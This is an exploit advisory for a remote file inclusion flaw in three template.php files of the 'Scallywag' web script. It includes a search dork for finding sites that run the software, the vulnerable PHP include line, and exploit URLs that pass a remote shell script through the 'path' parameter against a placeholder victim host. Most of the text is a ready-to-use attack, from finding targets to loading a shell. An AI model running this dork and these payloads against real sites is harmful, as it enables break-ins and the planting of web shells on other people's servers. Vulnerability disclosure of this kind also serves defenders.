############################################################################################## #Scallywag <= Remote File Inclusion Vulnerability # # # #Dork:"Powered by Scallywag" # # # # # ############################################################################################## #Vuln Code # # # #ERROR1:skin/dark/template.php # # # # <?php # # include("$path/source/top.txt"); <<< RFI CODE # # # # # #BUG1: # # # #Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] # ############################################################################################## # # #ERROR2:skin/gold/template.php # # # # <?php # # include("$path/source/top.txt"); <<< RFI CODE # # # # # #BUG2: # # # #Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]] # ############################################################################################## # # #ERROR3:skin/original/template.php # # # # <?php # # include("$path/source/top.txt"); <<< RFI CODE # # # # # #BUG3: # # # #Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]] # ############################################################################################## # # #Script Download # ############################################################################################## # # #http://www.woweb.ru/load/82-1-0-3791 # # # ############################################################################################## # # #Cyber-Security # # # ############################################################################################## ##############################################################################################